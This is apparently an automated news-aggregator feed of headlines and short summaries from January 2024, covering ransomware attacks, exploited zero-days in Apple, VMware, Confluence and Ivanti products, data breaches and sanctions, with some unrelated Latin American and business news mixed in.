            2024-01-24 https://www.malwarebytes.com/blog/threat-intelligence/2024/01/2024-state-of-ransomware-in-education-92-spike-in-k-12-attacks
            2023 was the worst ransomware year on record for Education.

            Autosummary: The Threat Landscape The top gangs that targeted the education sector between January 2023 and December 2023 include LockBit (60), Vice Society/Rhysida (44), CL0P (22), Medusa (17), and Akira (15). The data also shows that, while ransomware attacks against education are a global phenomenon, the US (with 80% of known attacks) and the UK (with 12%) were the most frequently attacked countries between January 2023 and December 2023.


            Argentina: Tens of thousands march against Javier Milei's cuts

            latam
            2024-01-24 https://www.bbc.co.uk/news/world-latin-america-68085197?at_medium=RSS&at_campaign=KARANGA
            Tens of thousands of Argentinians demonstrate against plans to reverse many employment protections.


            Top cybersecurity concerns for the upcoming elections

            ciber
            2024-01-23 https://www.helpnetsecurity.com/2024/01/23/2024-election-cybersecurity-video/

            In this Help Net Security video, Adam Marrè, CISO at Arctic Wolf, explains how state and local governments must focus on cybersecurity as the 2024 election approaches in the United States. State and local IT and cybersecurity teams usually have few staff members and are overwhelmed with daily tasks. This workload becomes even heavier during election years with extra responsibilities. The recent Arctic Wolf 2024 Election Security Survey found that: Nearly half of respondents expect … More

            The post Top cybersecurity concerns for the upcoming elections appeared first on Help Net Security.



            Apple Issues Patch for Critical Zero-Day in iPhones, Macs - Update Now

            exploits
            2024-01-23 https://thehackernews.com/2024/01/apple-issues-patch-for-critical-zero.html
            Apple on Monday released security updates for iOS, iPadOS, macOS, tvOS, and Safari web browser to address a zero-day flaw that has come under active exploitation in the wild. The issue, tracked as CVE-2024-23222, is a type confusion bug that could be exploited by a threat actor to achieve arbitrary code execution when processing maliciously crafted web content. The tech giant said the problem


            Tencent's Riot Games cuts 11% of global workforce

            industry
            2024-01-23 https://www.bbc.co.uk/news/business-68064952?at_medium=RSS&at_campaign=KARANGA
            Riot Games is the latest to cut jobs in the gaming industry after Amazon, ByteDance and Epic Games.


            Why cyberattacks mustn’t be kept secret

            ciber
            2024-01-23 https://www.helpnetsecurity.com/2024/01/23/cybersecurity-transparency/

            No company is immune to cyberattacks, but when the inevitable happens, too many companies still try to maintain a wall of silence. In fact, over half of security professionals admit their organizations maintain a culture of security through obscurity, with over one-third admitting they are completely secretive about their cybersecurity activities. While many organizations may fear reputational or monetary damage from proactively sharing findings from vulnerabilities and incidents, I’ve found the contrary to be true: … More

            The post Why cyberattacks mustn’t be kept secret appeared first on Help Net Security.

            Autosummary: The benefits of cyber transparency For individual organizations, transparency and accountability can be a significant differentiator that dictates conversations with customers, the C-Suite, the media, and other key stakeholders. Doing so builds a culture focused on openness, collaboration, and growth that strengthens the people, processes, and technology used to build more robust cybersecurity defenses overall. For maximum effectiveness, there are several best practices to keep in mind: Refrain from finger-pointing When vulnerabilities are discovered, many organizations quickly start looking for someone to blame.


            CISA adds VMware vCenter Server bug to its Known Exploited Vulnerabilities catalog

            exploits
            2024-01-23 https://securityaffairs.com/157941/security/cisa-vmware-vcenter-server-bug-known-exploited-vulnerabilities-catalog.html
            U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds VMware vCenter Server Out-of-Bounds Write bug to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a VMware vCenter Server Out-of-Bounds Write bug, tracked as CVE-2023-34048, to its Known Exploited Vulnerabilities (KEV) catalog. vCenter Server is a critical component in VMware virtualization and cloud computing […]

            Autosummary: "Analysis of the core dump of 'vmdird' by both Mandiant and VMware Product Security showed that the process crashing is closely aligned with the exploitation of CVE-2023-34048, the out-of-bounds write vCenter vulnerability in the implementation of the DCE/RPC protocol patched in October 2023, which enables unauthenticated remote command execution on vulnerable systems."


            Australia sanctions REvil hacker behind Medibank data breach

            financial
            2024-01-23 https://www.bleepingcomputer.com/news/security/australia-sanctions-revil-hacker-behind-medibank-data-breach/
            The Australian government has announced sanctions for Aleksandr Gennadievich Ermakov, a Russian national considered responsible for the 2022 Medibank hack and a member of the REvil ransomware group. [...]

            Autosummary: The leaked data included names, email addresses, phone numbers, physical addresses, passport numbers, health claims information, and health provider details.


            Microsoft got hacked by state sponsored group it was investigating

            government
            2024-01-23 https://www.malwarebytes.com/blog/news/2024/01/microsoft-got-hacked-by-state-sponsored-group-it-was-investigating
            Microsoft has acknowledged a cyberattack by the Russian state-sponsored group Cozy Bear, which, it says, was looking into how much information Microsoft holds about Cozy Bear.

            Autosummary: To date, there is no evidence that the threat actor had any access to customer environments, production systems, source code, or AI systems, but the investigation is still ongoing.


            Apple fixes actively exploited WebKit zero-day (CVE-2024-23222)

            exploits
            2024-01-23 https://www.helpnetsecurity.com/2024/01/23/cve-2024-23222/

            Apple has fixed an actively exploited zero-day vulnerability (CVE-2024-23222) that affects Macs, iPhones, iPads and AppleTVs. About CVE-2024-23222 CVE-2024-23222 is a type confusion issue that affects WebKit – Apple’s browser engine used in the Safari web browser and all iOS and iPadOS web browsers. “Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been exploited,” Apple noted in the software release notes. … More

            The post Apple fixes actively exploited WebKit zero-day (CVE-2024-23222) appeared first on Help Net Security.



            "Activator" Alert: MacOS Malware Hides in Cracked Apps, Targeting Crypto Wallets

            exploits
            2024-01-23 https://thehackernews.com/2024/01/activator-alert-macos-malware-hides-in.html
            Cracked software has been observed infecting Apple macOS users with a previously undocumented stealer malware capable of harvesting system information and cryptocurrency wallet data. Kaspersky, which identified the artifacts in the wild, said they are designed to target machines running macOS Ventura 13.6 and later, indicating the malware's ability to infect Macs on both Intel and


            ~40,000 Attacks in 3 Days: Critical Confluence RCE Under Active Exploitation

            exploits
            2024-01-23 https://thehackernews.com/2024/01/40000-attacks-in-3-days-critical.html
            Malicious actors have begun to actively exploit a recently disclosed critical security flaw impacting Atlassian Confluence Data Center and Confluence Server, within three days of public disclosure. Tracked as CVE-2023-22527 (CVSS score: 10.0), the vulnerability impacts out-of-date versions of the software, allowing unauthenticated attackers to achieve remote code execution on susceptible


            LoanDepot data breach impacted roughly 16.6 individuals

            financial
            2024-01-23 https://securityaffairs.com/157972/hacking/loandepot-data-breach.html
            Financial services company LoanDepot disclosed a data breach that impacted roughly 16.6 million individuals. LoanDepot is a financial services company that primarily operates as a mortgage lender. It is one of the largest nonbank lenders in the United States. The company provides a range of mortgage and non-mortgage loan products and services. LoanDepot disclosed this […]

            Autosummary: (Pierluigi Paganini, January 23, 2024) Financial services company LoanDepot disclosed a data breach that impacted roughly 16.6 million individuals.


            Chiapas violence: Hundreds flee cartel battles in southern Mexico

            latam
            2024-01-23 https://www.bbc.co.uk/news/world-latin-america-68067681?at_medium=RSS&at_campaign=KARANGA
            Two rival cartels are fighting for territory in southern Chiapas state, displacing entire communities.


            VexTrio: The Uber of Cybercrime - Brokering Malware for 60+ Affiliates

            exploits
            2024-01-23 https://thehackernews.com/2024/01/vextrio-uber-of-cybercrime-brokering.html
            The threat actors behind ClearFake, SocGholish, and dozens of other actors have established partnerships with another entity known as VexTrio as part of a massive "criminal affiliate program," new findings from Infoblox reveal. The latest development demonstrates the "breadth of their activities and depth of their connections within the cybercrime industry," the company said,

            Autosummary: VexTrio, which is believed to have been active since at least 2017, has been attributed to malicious campaigns that use domains generated by a dictionary domain generation algorithm (DDGA) to propagate scams, riskware, spyware, adware, potentially unwanted programs (PUPs), and pornographic content.


            Australian government announced sanctions for Medibank hacker

            financial government
            2024-01-23 https://securityaffairs.com/157983/hacking/australia-sanctions-for-medibank-hacker.html
            The Australian government announced sanctions for a member of the REvil ransomware group for the Medibank hack that occurred in 2022. The Australian government announced sanctions for Aleksandr Gennadievich Ermakov (aka GustaveDore, aiiis_ermak, blade_runner, JimJones), a Russian national who is a member of the REvil ransomware group. The man is responsible for the cyber attacks […]

            Autosummary: As you might recall, more than 9 million records of Australians, including names, dates of birth, Medicare numbers and sensitive information were stolen in the 2022 attack, and the majority published on the dark web.


            US appeals court revives Mexico's $10bn lawsuit against gunmakers

            latam
            2024-01-23 https://www.bbc.co.uk/news/world-us-canada-68071549?at_medium=RSS&at_campaign=KARANGA
            The $10bn lawsuit from Mexico alleges that US gun manufacturers knowingly fuel cartel violence.


            X adds passkeys support for iOS users in the United States

            government
            2024-01-23 https://www.bleepingcomputer.com/news/security/x-adds-passkeys-support-for-ios-users-in-the-united-states/
            X, formerly Twitter, announced today that iOS users in the United States can now log into their accounts using passkeys. [...]

            Autosummary: To add a passkey, you have to log into your account, click "Your account" in the navigation bar, go to "Settings and privacy," then click "Security and Account Access," then "Security."


            Kasseika ransomware uses antivirus driver to kill other antiviruses

            exploits ransomware
            2024-01-23 https://www.bleepingcomputer.com/news/security/kasseika-ransomware-uses-antivirus-driver-to-kill-other-antiviruses/
            A recently uncovered ransomware operation named "Kasseika" has joined the club of threat actors that employ Bring Your Own Vulnerable Driver (BYOVD) tactics to disable antivirus software before encrypting files. [...]

            Autosummary: By using BYOVD attacks, aka exploiting flaws in the loaded driver, the malware gains the privileges to terminate 991 processes from a hardcoded list, many of which correspond to antivirus products, security tools, analysis tools, and system utilities.


            Exploit released for Fortra GoAnywhere MFT auth bypass bug

            exploits
            2024-01-23 https://www.bleepingcomputer.com/news/security/exploit-released-for-fortra-goanywhere-mft-auth-bypass-bug/
            Exploit code is now available for a critical authentication bypass vulnerability in Fortra's GoAnywhere MFT (Managed File Transfer) software that allows attackers to create new admin users on unpatched instances via the administration portal. [...]

            Autosummary: The list of victims who came forward after being breached and extorted by Clop includes but is not limited to healthcare giant Community Health Systems (CHS), consumer goods giant Procter & Gamble, cybersecurity firm Rubrik, Hitachi Energy, fintech platform Hatch Bank, luxury brand retailer Saks Fifth Avenue, and the City of Toronto, Canada.


            Water services giant Veolia North America hit by ransomware attack

            exploits ransomware
            2024-01-23 https://www.bleepingcomputer.com/news/security/water-services-giant-veolia-north-america-hit-by-ransomware-attack/
            Veolia North America, a subsidiary of transnational conglomerate Veolia, disclosed a ransomware attack that impacted systems part of its Municipal Water division and disrupted its bill payment systems. [...] "

            Autosummary: U.S. Water and Wastewater Systems (WWS) Sector facilities have also been breached multiple times by several threat groups deploying Ghost, ZuCaNo, and Makop ransomware in recent years. Other breaches of water facilities have happened over the past two decades, including a South Houston wastewater treatment plant in 2011, a water company with outdated software and hardware equipment in 2016, the Southern California Camrosa Water District in August 2020, and a Pennsylvania water system in May 2021. "


            US, UK, Australia sanction REvil hacker behind Medibank data breach

            financial
            2024-01-23 https://www.bleepingcomputer.com/news/security/us-uk-australia-sanction-revil-hacker-behind-medibank-data-breach/
            The Australian government has announced sanctions for Aleksandr Gennadievich Ermakov, a Russian national considered responsible for the 2022 Medibank hack and a member of the REvil ransomware group. [...] "

            Autosummary: The leaked data included names, email addresses, phone numbers, physical addresses, passport numbers, health claims information, and health provider details. "


            Break the fake: The race is on to stop AI voice cloning scams

            financial
            2024-01-23 https://www.welivesecurity.com/en/scams/race-stop-ai-voice-cloning-scams/
            As AI-powered voice cloning turbocharges imposter scams, we sit down with ESET’s Jake Moore to discuss how to hang up on ‘hi-fi’ scam calls – and what the future holds for deepfake detection "

            Autosummary: It will all sound convincing, complete with an air of urgency, and with what seems like auditory multi-factor authentication, but you can still get scammed, even if you “personally heard from an official”. Now, in the US at least, there’s a contest to break the fake, and hopefully find ways to provide defensive systems with ways to thwart a related attack. "


            Apache ActiveMQ Flaw Exploited in New Godzilla Web Shell Attacks

            exploits
            2024-01-22 https://thehackernews.com/2024/01/apache-activemq-flaw-exploited-in-new.html
            Cybersecurity researchers are warning of a "notable increase" in threat actor activity actively exploiting a now-patched flaw in Apache ActiveMQ to deliver the Godzilla web shell on compromised hosts. "The web shells are concealed within an unknown binary format and are designed to evade security and signature-based scanners," Trustwave said. "Notably, despite the binary's unknown file "

            Autosummary: "


            With hackers poisoning water systems, US agencies issue incident response guide to boost cybersecurity

            ciber
            2024-01-22 https://www.tripwire.com/state-of-security/us-agencies-issue-cybersecurity-guide-response-cybercriminals-targeting-water
            US federal agencies have teamed up to release a cybersecurity best practice guidance for the water and wastewater sector (WWS). Read more in my article on the Tripwire State of Security blog. "

            Autosummary: The guidance issued by the FBI, CISA, and EPA focuses on the four stages of incident response: Preparation: WWS Sector organizations should have an incident response plan in place, implement available services and resources to raise their cyber baseline, and engage with the WWS Sector cyber community. "


            Resecurity and Cybercrime Atlas join forces to disrupt cybercriminal operations

            ciber
            2024-01-22 https://www.helpnetsecurity.com/2024/01/22/resecurity-cybercrime-atlas-partnership/

            In an era where cybercrime poses a pervasive threat to individuals, corporations, and governments worldwide, Resecurity and Cybercrime Atlas have forged a partnership aimed at disrupting the global cybercriminal ecosystem. The Cybercrime Atlas is hosted by the World Economic Forum’s Centre for Cybersecurity and uses open-source research to create new insights into the cybercriminal ecosystem. The Cybercrime Atlas community is made up of organizations who have a key role in identifying and disrupting cybercriminal operations. … More

            The post Resecurity and Cybercrime Atlas join forces to disrupt cybercriminal operations appeared first on Help Net Security.

            "

            Autosummary: This collaborative effort aims to establish an action-oriented, global repository of cybercriminal intelligence, fostering cooperation between cybercrime investigators, law enforcement agencies, and businesses on a national and international scale. "


            Tietoevry ransomware attack halts Swedish organizations

            exploits ransomware
            2024-01-22 https://www.helpnetsecurity.com/2024/01/22/tietoevry-ransomware/

            Finnish IT software and service company Tietoevry has suffered a ransomware attack that affected several customers of one of its datacenters in Sweden. The attack: The ransomware attack took place during the night of January 19-20. “The attack was limited to one part of one of our Swedish datacenters, impacting Tietoevry’s services to some of our customers in Sweden,” the company noted. “Tietoevry immediately isolated the affected platform, and the ransomware attack has not affected … More

            The post Tietoevry ransomware attack halts Swedish organizations appeared first on Help Net Security.

            "

            Autosummary: "


            Threat actors exploit Apache ActiveMQ flaw to deliver the Godzilla Web Shell

            exploits
            2024-01-22 https://securityaffairs.com/157887/malware/apache-activemq-godzilla-web-shell.html
            Researchers warn of a spike in attacks exploiting a now-patched flaw in Apache ActiveMQ to deliver the Godzilla web shell. Trustwave researchers observed a surge in attacks exploiting a now-patched flaw in Apache ActiveMQ, in many cases aimed at delivering a malicious code that borrows the code from the open-source web shell Godzilla. Threat actors conceal […] "

            Autosummary: The Godzilla Web Shell supports multiple functionalities, including: viewing network details; conducting port scans; executing Mimikatz commands; running Meterpreter commands; executing shell commands; remotely managing SQL databases; injecting shellcode into processes; and handling file management tasks. The report includes Indicators of Compromise (IoCs). "


            Cybercriminals leaked massive volumes of stolen PII data from Thailand in Dark Web

            ciber
            2024-01-22 https://securityaffairs.com/157870/data-breach/resecurity-massive-thailand-data-leak.html
            Resecurity researchers warn of massive leak of stolen Thai personally identifiable information (PII) on the dark web by cybercriminals. Resecurity has detected a noticeable increase in data leaks from consumer-focused platforms in Thailand, confirming that threat actors are actively targeting the personal data of citizens now at the beginning of 2024. Thailand is swiftly becoming […] "

            Autosummary: "


            loanDepot says ransomware gang stole data of 16.6 million people

            exploits ransomware
            2024-01-22 https://www.bleepingcomputer.com/news/security/loandepot-says-ransomware-gang-stole-data-of-166-million-people/
            Mortgage lender loanDepot says that approximately 16.6 million people had their personal information stolen in a ransomware attack disclosed earlier this month. [...] "

            Autosummary: "


            Hackers start exploiting critical Atlassian Confluence RCE flaw

            exploits
            2024-01-22 https://www.bleepingcomputer.com/news/security/hackers-start-exploiting-critical-atlassian-confluence-rce-flaw/
            Security researchers are observing exploitation attempts for the CVE-2023-22527 remote code execution vulnerability that affects outdated versions of Atlassian Confluence servers. [...] "

            Autosummary: "


            “My Slice”, an Italian adaptive phishing campaign

            financial
            2024-01-22 https://securityaffairs.com/157914/cyber-crime/my-slice-aitalian-adaptive-phishing-campaign.html
            Adaptive phishing campaigns are emerging as an increasingly sophisticated threat in the cybersecurity landscape. The phenomenon: This phenomenon represents an evolution of traditional phishing tactics, as attackers seek to overcome defenses using more personalized and targeted approaches. In an adaptive phishing campaign, attackers gather specific information about victims through various sources, such as social media, […] "

            Autosummary: The organisation’s domain name is extracted, based on the victim’s e-mail address, from the string following the @ symbol (in this case from “[email protected]” the domain name obtained is example.com); with a JS function they extract the e-mail domain name and invoke the http://logo.clearbit[.]com/[domain name] service to derive the company logo. “My slice”, the details of the Italian campaign: Last year, a highly targeted phishing campaign that I renamed “My slice” (derived from the name of a variable in the javascript code of the landing page) targeted e-mail account holders of Italian organisations. "


            Narco-sub with $27m of "scorpion" cocaine seized in Colombia

            latam
            2024-01-22 https://www.bbc.co.uk/news/world-latin-america-68059754?at_medium=RSS&at_campaign=KARANGA
            The 15m-long "narco-sub" is the first to be detected this year in Colombian waters, its navy says. "

            Autosummary: "


            Cryptocurrency firm Terraform Labs files for bankruptcy in US

            financial
            2024-01-22 https://www.bbc.co.uk/news/technology-68055557?at_medium=RSS&at_campaign=KARANGA
            The company, whose co-founder is in jail in Montenegro, was behind the crashed TerraUSD and Luna tokens. "

            Autosummary: "


            Apple fixes first zero-day bug exploited in attacks this year

            exploits
            2024-01-22 https://www.bleepingcomputer.com/news/apple/apple-fixes-first-zero-day-bug-exploited-in-attacks-this-year/
            Apple released security updates to address this year's first zero-day vulnerability exploited in attacks that could impact iPhones, Macs, and Apple TVs. [...] "

            Autosummary: "


            loanDepot cyberattack causes data breach for 16.6 million people

            financial ciber
            2024-01-22 https://www.bleepingcomputer.com/news/security/loandepot-cyberattack-causes-data-breach-for-166-million-people/
            Mortgage lender loanDepot says that approximately 16.6 million people had their personal information stolen in a ransomware attack disclosed earlier this month. [...] "

            Autosummary: "


            Apple fixed actively exploited zero-day CVE-2024-23222

            exploits
            2024-01-22 https://securityaffairs.com/157925/security/apple-first-zero-day-2024.html
            Apple addressed the first zero-day vulnerability that impacts iPhones, Macs, and Apple TVs. The issue is actively exploited in the wild. Apple released security updates to address a zero-day vulnerability, tracked as CVE-2024-23222, that impacts iPhones, Macs, and Apple TVs. This is the first actively exploited zero-day vulnerability fixed by the company this year. The […] "

            Autosummary: "


            Supreme Court allows agents to cut razor wire at Texas-Mexico border

            latam
            2024-01-22 https://www.bbc.co.uk/news/world-us-canada-68064246?at_medium=RSS&at_campaign=KARANGA
            A top court decision allows federal agents to remove wire installed by Texas at the southern border. "

            Autosummary: "


            "Drugged, robbed, killed": The city catching US tourists in dating trap

            government
            2024-01-21 https://www.bbc.co.uk/news/world-latin-america-68022288?at_medium=RSS&at_campaign=KARANGA
            Relatives of men killed in Medellin after meeting local women for dates are now searching for answers. "

            Autosummary: "


            Week in review: 10 cybersecurity frameworks you need to know, exploited Chrome zero-day fixed

            exploits ciber
            2024-01-21 https://www.helpnetsecurity.com/2024/01/21/week-in-review-10-cybersecurity-frameworks-you-need-to-know-exploited-chrome-zero-day-fixed/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Key elements for a successful cyber risk management strategy In this Help Net Security interview, Yoav Nathaniel, CEO at Silk Security, discusses the evolution of cyber risk management strategies and practices, uncovering common mistakes and highlighting key components for successful risk resolution. CISOs’ crucial role in aligning security goals with enterprise expectations In this Help Net Security interview, Chris Mixter, … More

            The post Week in review: 10 cybersecurity frameworks you need to know, exploited Chrome zero-day fixed appeared first on Help Net Security.

            "

            Autosummary: Ransomware negotiation: When cybersecurity meets crisis management In this Help Net Security interview, Tim Morris, Chief Security Advisor at Tanium, discusses ransomware negotiation, how it typically unfolds, and how organizations should have a playbook that clearly outlines what to do, when to do it, who is notified, who will inform the board, who will talk to the press, etc. Ivanti EPMM and MobileIron Core vulnerability is actively exploited, CISA confirms (CVE-2023-35082) A previously patched critical vulnerability (CVE-2023-35082) affecting Ivanti Endpoint Manager Mobile (EPMM) and MobileIron Core is being actively exploited, the Cybersecurity and Infrastructure Security Agency (CISA) has confirmed by adding the vulnerability to its Known Exploited Vulnerabilities Catalog (KEV). "


            Tietoevry ransomware attack causes outages for Swedish firms, cities

            exploits ransomware
            2024-01-21 https://www.bleepingcomputer.com/news/security/tietoevry-ransomware-attack-causes-outages-for-swedish-firms-cities/
            Finnish IT services and enterprise cloud hosting provider Tietoevry has suffered a ransomware attack impacting cloud hosting customers in one of its data centers in Sweden, with the attack reportedly conducted by the Akira ransomware gang. [...] "

            Autosummary: [Image: Message on Filmstaden's website warning of the IT outage. Source: BleepingComputer] Other companies impacted by the attack include discount retail chain Rusta, raw building materials provider Moelven, and farming supplier Grangnården, which was forced to close its stores while IT services are restored. Impacted universities and colleges in the country include the Karolinska Institutet, SLU, University West, Stockholm University, Lunds Universitet, and Malmö University. "


            Watch out for "I can't believe he is gone" Facebook phishing posts

            financial
            2024-01-21 https://www.bleepingcomputer.com/news/security/watch-out-for-i-cant-believe-he-is-gone-facebook-phishing-posts/
            A widespread Facebook phishing campaign stating, "I can't believe he is gone. I'm gonna miss him so much," leads unsuspecting users to a website that steals your Facebook credentials. [...] "

            Autosummary: [Image: Facebook "I'm gonna miss him so much" phishing posts. Source: BleepingComputer] When BleepingComputer tested the links in the phishing posts, they brought us to different sites depending on the type of device you are using. "


            LockBit ransomware gang claims the attack on the sandwich chain Subway

            exploits ransomware
            2024-01-21 https://securityaffairs.com/157852/cyber-crime/lockbit-hacked-sandwich-chain-subway.html
            The LockBit ransomware gang claimed to have hacked Subway, the American multinational fast food restaurant franchise. Subway IP LLC is an American multinational fast-food restaurant franchise that specializes in submarine sandwiches (subs), wraps, salads, and drinks. The LockBit ransomware group added Subway to the list of victims on its Tor data leak site and threatened to leak […] "

            Autosummary: "


            Russian hackers stole Microsoft corporate emails in month-long breach

            rusia-ucrania
            2024-01-20 https://www.bleepingcomputer.com/news/security/russian-hackers-stole-microsoft-corporate-emails-in-month-long-breach/
            Microsoft disclosed Friday night that some of its corporate email accounts were breached and data stolen by the Russian state-sponsored hacking group Midnight Blizzard. [...] "

            Autosummary: The company detected the attack on January 12th, with Microsoft initiating its response to investigate, disrupt, and mitigate the breach. "


            CISA Issues Emergency Directive to Federal Agencies on Ivanti Zero-Day Exploits

            exploits
            2024-01-20 https://thehackernews.com/2024/01/cisa-issues-emergency-directive-to.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday issued an emergency directive urging Federal Civilian Executive Branch (FCEB) agencies to implement mitigations against two actively exploited zero-day flaws in Ivanti Connect Secure (ICS) and Ivanti Policy Secure (IPS) products. The development came after the vulnerabilities – an authentication bypass "

            Autosummary: "


            Invoice Phishing Alert: TA866 Deploys WasabiSeed & Screenshotter Malware

            financial exploits
            2024-01-20 https://thehackernews.com/2024/01/invoice-phishing-alert-ta866-deploys.html
            The threat actor tracked as TA866 has resurfaced after a nine-month hiatus with a new large-volume phishing campaign to deliver known malware families such as WasabiSeed and Screenshotter. The campaign, observed earlier this month and blocked by Proofpoint on January 11, 2024, involved sending thousands of invoice-themed emails targeting North America bearing decoy PDF files. "The PDFs "

            Autosummary: "Their strategy involves caching a seemingly benign version of the attack vector and subsequently altering it to deliver a malicious payload," Trellix said, stating such attacks have disproportionately targeted financial services, manufacturing, retail, and insurance verticals in Italy, the U.S., France, Australia, and India. "


            Ecuador: Argentina expels family of gang boss Adolfo Macías

            latam
            2024-01-20 https://www.bbc.co.uk/news/world-latin-america-68038970?at_medium=RSS&at_campaign=KARANGA
            The wife and children of Adolfo Macías - alias Fito - are deported amid a major manhunt for the gang boss. "

            Autosummary: "


            Chinese Hackers Silently Weaponized VMware Zero-Day Flaw for 2 Years

            exploits
            2024-01-20 https://thehackernews.com/2024/01/chinese-hackers-silently-weaponized.html
            An advanced China-nexus cyber espionage group previously linked to the exploitation of security flaws in VMware and Fortinet appliances has been linked to the abuse of a critical vulnerability in VMware vCenter Server as a zero-day since late 2021. "UNC3886 has a track record of utilizing zero-day vulnerabilities to complete their mission without being detected, and this latest example further "

            Autosummary: "


            Researchers link 3AM ransomware to Conti, Royal cybercrime gangs

            exploits ransomware
            2024-01-20 https://www.bleepingcomputer.com/news/security/researchers-link-3am-ransomware-to-conti-royal-cybercrime-gangs/
            Security researchers analyzing the activity of the recently emerged 3AM ransomware operation uncovered close connections with infamous groups, such as the Conti syndicate and the Royal ransomware gang. [...] "

            Autosummary: [Image: Analysis of 3AM ransomware intrusion set. Source: Intrinsec] A closer analysis revealed that six of the 27 servers shared the same port, protocol, Apache product with the same version, autonomous system (AS16125), organization, and the text “llc” indicating a ‘limited liability company’. The syndicate split into multiple cells and the ransomware brand dissolved, but many of its members and affiliates partnered with other operations, contributing experienced individuals for all stages of an attack, from target analysis and initial access to negotiations, infrastructure, developers, and operators. "


            Court charges dev with hacking after cybersecurity issue disclosure

            ciber
            2024-01-20 https://www.bleepingcomputer.com/news/security/court-charges-dev-with-hacking-after-cybersecurity-issue-disclosure/
            A German court has charged a programmer investigating an IT problem with hacking and fined them €3,000 ($3,265) for what it deemed was unauthorized access to external computer systems and spying on data. [...] "

            Autosummary: According to the original report by Heise, the programmer, operating as a freelance IT service provider, was initially tasked by a client to resolve excessive log generation issues with the merchandise management software they were using. "


            Npm Trojan Bypasses UAC, Installs AnyDesk with "Oscompatible" Package

            exploits
            2024-01-19 https://thehackernews.com/2024/01/npm-trojan-bypasses-uac-installs.html
            A malicious package uploaded to the npm registry has been found deploying a sophisticated remote access trojan on compromised Windows machines. The package, named "oscompatible," was published on January 9, 2024, attracting a total of 380 downloads before it was taken down. oscompatible included a "few strange binaries," according to software supply chain security firm Phylum, including a single "

            Autosummary: The trojanized version of the library is designed to decrypt the DAT file ("msedge.dat") and launch another DLL called "msedgedat.dll," which, in turn, establishes connections with an actor-controlled domain named "kdark1[.]com" to retrieve a ZIP archive. "


            U.S. Cybersecurity Agency Warns of Actively Exploited Ivanti EPMM Vulnerability

            exploits ciber
            2024-01-19 https://thehackernews.com/2024/01/us-cybersecurity-agency-warns-of.html
            The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday added a now-patched critical flaw impacting Ivanti Endpoint Manager Mobile (EPMM) and MobileIron Core to its Known Exploited Vulnerabilities (KEV) catalog, stating it's being actively exploited in the wild. The vulnerability in question is CVE-2023-35082 (CVSS score: 9.8), an authentication bypass "

            Autosummary: "


            Kansas State University suffered a serious cybersecurity incident

            government ciber
            2024-01-19 https://securityaffairs.com/157729/security/kansas-state-university-cyber-attack.html
            Kansas State University (K-State) suffered a cybersecurity incident that has disrupted part of its network and services. Kansas State University (K-State) suffered a cybersecurity incident that impacted a portion of its network and services. On January 16, 2023, the University K-State announced it was experiencing a disruption to certain network systems, including VPN, K-State Today […] "

            Autosummary: On January 16, 2023, the University K-State announced it was experiencing a disruption to certain network systems, including VPN, K-State Today emails, and videos on Canvas, or Mediasite. "


            Chinese hackers exploit VMware bug as zero-day for two years

            exploits
            2024-01-19 https://www.bleepingcomputer.com/news/security/chinese-hackers-exploit-vmware-bug-as-zero-day-for-two-years/
            A Chinese hacking group has been exploiting a critical vCenter Server vulnerability (CVE-2023-34048) as a zero-day since at least late 2021. [...] "

            Autosummary: [Image: UNC3886 attack chain. Source: Mandiant] "While publicly reported and patched in October 2023, Mandiant has observed these crashes across multiple UNC3886 cases between late 2021 and early 2022, leaving a window of roughly a year and a half that this attacker had access to this vulnerability," Mandiant said on Friday. "


            Vans, North Face owner says ransomware breach affects 35 million people

            exploits ransomware
            2024-01-19 https://www.bleepingcomputer.com/news/security/vans-north-face-owner-says-ransomware-breach-affects-35-million-people/
            VF Corporation, the company behind brands like Vans, Timberland, The North Face, Dickies, and Supreme, said that more than 35 million customers had their personal information stolen in a December ransomware attack. [...] "

            Autosummary: "


            VMware confirms critical vCenter flaw now exploited in attacks

            exploits
            2024-01-19 https://www.bleepingcomputer.com/news/security/vmware-confirms-critical-vcenter-flaw-now-exploited-in-attacks/
            VMware has confirmed that a critical vCenter Server remote code execution vulnerability patched in October is now under active exploitation. [...] "

            Autosummary: Many ransomware groups (like Royal, Black Basta, LockBit, and, more recently, RTM Locker, Qilin, ESXiArgs, Monti, and Akira) are now known for directly targeting the victims' VMware ESXi servers to steal and encrypt their files and demand huge ransoms. "


            CISA urges urgent patching of two actively exploited Citrix NetScaler vulnerabilities

            exploits
            2024-01-19 https://www.malwarebytes.com/blog/news/2024/01/cisa-urges-urgent-patching-of-two-actively-exploited-citrix-netscaler-vulnerabilities
            CISA has added two Citrix NetScaler vulnerabilities to its vulnerability catalog, with a very short deadline to patch. "

            Autosummary: The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerabilities: NetScaler ADC and NetScaler Gateway 14.1 before 14.1-12.35; NetScaler ADC and NetScaler Gateway 13.1 before 13.1-51.15; NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.21; NetScaler ADC 13.1-FIPS before 13.1-37.176; NetScaler ADC 12.1-FIPS before 12.1-55.302; NetScaler ADC 12.1-NDcPP before 12.1-55.302. Note: NetScaler ADC and NetScaler Gateway version 12.1 is now End Of Life (EOL) and is vulnerable. "


            35.5 million customers of major apparel brands have their data breached after ransomware attack

            financial exploits ransomware
            2024-01-19 https://www.bitdefender.com/blog/hotforsecurity/35-5-million-customers-of-major-apparel-brands-have-their-data-breached-after-ransomware-attack/
            Bought some Timberland shoes? Wear a North Face jacket? You, and millions of purchasers of other popular high-street brands, could have had their data stolen by the ALPHV ransomware group. Read more in my article on the Hot for Security blog. "

            Autosummary: VF Corp's family of brands include: Altra, Dickies, Eastpak, icebreaker, JanSport, Kipling, Napapijri, Smartwool, Supreme, The North Face, Timberland, and Vans. The good news is that VF Corp does not retain consumers' payment card details, bank account information, or social security numbers, so you probably don't have to worry that that particularly sensitive information has fallen into the hands of hackers. "


            Ransomware attacks break records in 2023: the number of victims rose by 128%

            exploits
            2024-01-19 https://securityaffairs.com/157759/reports/ransomware-attacks-2023-report.html
